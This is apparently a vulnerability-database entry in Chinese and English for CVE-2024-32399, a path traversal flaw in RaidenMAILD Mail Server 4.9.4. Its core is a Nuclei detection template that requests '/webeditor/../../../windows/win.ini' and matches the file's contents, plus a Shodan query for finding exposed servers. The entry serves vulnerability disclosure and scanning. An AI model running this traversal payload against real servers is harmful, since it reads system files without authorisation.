漏洞描述
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
CVE-2024-32399: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
PoC代码[已公开]
id: CVE-2024-32399
info:
name: RaidenMAILD Mail Server v.4.9.4 - Path Traversal
author: DhiyaneshDK
severity: high
description: |
Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.
reference:
- https://owasp.org/www-community/attacks/Path_Traversal
- https://github.com/NN0b0dy/CVE-2024-32399/blob/main/README.md
- https://github.com/NN0b0dy/c01/blob/main/01.pdf
- https://github.com/NN0b0dy/CVE-2024-32399
- https://github.com/nomi-sec/PoC-in-GitHub
classification:
epss-score: 0.83509
epss-percentile: 0.99241
cpe: cpe:2.3:a:raidenmaild:raidenmaild:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: html:"RaidenMAILD"
product: raidenmaild
vendor: raidenmaild
tags: cve,cve2024,lfi,raiden,mail,server
http:
- method: GET
path:
- "{{BaseURL}}/webeditor/../../../windows/win.ini"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "[fonts]", "for 16-bit app support")'
- 'contains(header, "application/octet-stream")'
- 'status_code == 200'
condition: and
# digest: 490a0046304402204e4e9142e4648a638ca6fbc557eb4b978474f8a067e6d5b7d980092c5d960d8102204d2e942e4706f93d63a3bd21c3b4e6648deb852e7251671118c21351c8170986:922c64590222798bb761d5b6d8e72950